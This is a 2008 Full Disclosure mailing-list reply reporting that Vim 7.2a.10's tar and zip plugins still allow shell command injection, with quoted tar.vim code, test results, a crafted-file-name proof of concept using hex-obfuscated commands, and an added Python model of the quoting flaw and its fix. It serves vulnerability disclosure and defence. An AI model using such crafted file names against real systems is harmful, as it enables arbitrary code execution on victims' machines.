Full Disclosure
mailing list archives
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
From: "Jan Minář" <rdancer () rdancer org>
Date: Tue, 1 Jul 2008 20:36:29 +0100
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:
> Jan Minar wrote:
> > 1. Summary
> > Product : Vim -- Vi IMproved
> > Version : Tested with 7.1.314 and 6.4
> > Impact : Arbitrary code execution
> > Wherefrom: Local and remote
> > Original : http://www.rdancer.org/vulnerablevim.html
> > Improper quoting in some parts of Vim written in the Vim Script can lead to
> > arbitrary code execution upon opening a crafted file.
> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed; this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.org/vulnerablevim.html.
Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:
-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
strong : EXPLOIT FAILED
weak : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
xpm : EXPLOIT FAILED
xpm2 : EXPLOIT FAILED
remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED
The original tarplugin exploit now produces a string of telling error messages:
/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found
It's easy to see that it is still possible to execute arbitrary shell commands.
$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10 (wrapped lines rejoined; the (*) and (**) marks are explained below):
  136 if tarfile =~# '\.\(gz\|tgz\)$'
  137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
  139 elseif tarfile =~# '\.lrp'
  140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
 *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
  142 elseif tarfile =~# '\.bz2$'
  143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
  145 else
  146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
**147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
[...]
  444 fun s:Escape(name)
  445 " shellescape() was added by patch 7.0.111
  446 if exists("*shellescape")
  447 let qnameq= shellescape(a:name)
  448 else
  449 let qnameq= g:tar_shq . a:name . g:tar_shq
  450 endif
  451 return qnameq
  452 endfun
(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'',
and ``--use-compress-program''.
The updated tarplugin attack is rather simple:
$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
# (the hex string decodes to: date > pwned)
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
Cheers,
Jan Minar.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
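The Python script below is an added illustration and is not part of the original post or of Vim's tar.vim. It shows why the single-quoting done by s:Escape() is not enough: Vim's :! and :r! cmdline replaces a bare % with the current file name *after* the script has quoted it, so a crafted name re-enters the command unquoted, and only then does the shell parse the result. Assumptions: vim_bang_expand() is a deliberately simplified stand-in for Vim's cmdline expansion (bare % becomes the current file name, bare # the alternate file name, a backslash before either yields the literal character; <cword>, <cfile> and the other special items are ignored); "echo ARGS:" stands in for g:tar_cmd so the script runs without an archive; the crafted file name is constructed and its payload is "echo INJECTED" instead of the post's date > pwned. sh_quote_special() reproduces by hand what current Vim's shellescape({string}, 1) does (backslash before !, % and #, which :! strips again), and the -- before the operand is the separate defence against names that begin with "-".

```python
"""Two layers interpret the command tar.vim builds:
  1. Vim's :! / :r! cmdline, which expands a bare % into the current file
     name after the script has already quoted it (modelled by vim_bang_expand);
  2. /bin/sh, which parses the expanded string (real, via subprocess).
The lesson: quoting for layer 2 alone is defeated by layer 1.
"""
import subprocess

# Constructed attacker-controlled file name. The % is re-expanded by layer 1
# into this raw name, dragging a single quote and ';' out of the quoting.
CRAFTED_NAME = "foo%;echo INJECTED;'bar.tar"


def sh_quote(name):
    """What shellescape({name}) does on Unix: wrap in '...' and escape embedded '."""
    return "'" + name.replace("'", "'\\''") + "'"


def sh_quote_special(name):
    """What shellescape({name}, 1) does: additionally put a backslash before the
    characters the :! cmdline would expand; :! removes that backslash again."""
    out = []
    for ch in sh_quote(name):
        if ch in "%#!":
            out.append("\\")
        out.append(ch)
    return "".join(out)


def vim_bang_expand(cmdline, curfile, altfile=""):
    """Simplified model of Vim's :! expansion (assumption: only %, # and their
    backslash-escaped forms are handled). The file name is inserted raw."""
    out = []
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline) and cmdline[i + 1] in "%#!":
            out.append(cmdline[i + 1])  # \% -> literal %, backslash dropped
            i += 2
            continue
        if ch == "%":
            out.append(curfile)  # no quoting applied here: this is the bug
        elif ch == "#":
            out.append(altfile)
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def run_in_shell(cmdline):
    """Hand the expanded command line to /bin/sh, as :r! would; return stdout lines."""
    proc = subprocess.run(["sh", "-c", cmdline], capture_output=True, text=True)
    return proc.stdout.splitlines()


def browse_vulnerable(tarfile):
    """Shape of tar.vim line 147 as quoted in the post: shellescape() only.
    'echo ARGS:' stands in for g:tar_cmd so this runs without an archive."""
    cmdline = "echo ARGS: " + sh_quote(tarfile)
    return run_in_shell(vim_bang_expand(cmdline, curfile=tarfile))


def browse_hardened(tarfile):
    """Escape the cmdline specials as well, and put -- before the operand so a
    name starting with '-' cannot be taken by tar as an option."""
    cmdline = "echo ARGS: -- " + sh_quote_special(tarfile)
    return run_in_shell(vim_bang_expand(cmdline, curfile=tarfile))


def injected(lines):
    """True if the attacker's 'echo INJECTED' ran as a command of its own."""
    return "INJECTED" in lines


if __name__ == "__main__":
    print("vulnerable:", browse_vulnerable(CRAFTED_NAME))
    print("hardened:  ", browse_hardened(CRAFTED_NAME))
```

Run with python3 on a system with /bin/sh: the vulnerable path prints a separate INJECTED line (the shell also complains about a leftover command, as in the tar error messages above), while the hardened path prints one line with the crafted name intact as a single argument after --.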